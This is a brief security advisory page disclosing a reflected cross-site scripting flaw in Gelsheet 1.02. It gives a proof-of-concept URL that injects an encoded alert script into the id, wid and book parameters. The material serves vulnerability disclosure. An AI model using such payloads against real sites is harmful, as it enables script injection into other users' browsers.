Home
Consulting
Advisories
Software
Articles
Contact

Gelsheet 1.02 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Gelsheet 1.02 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC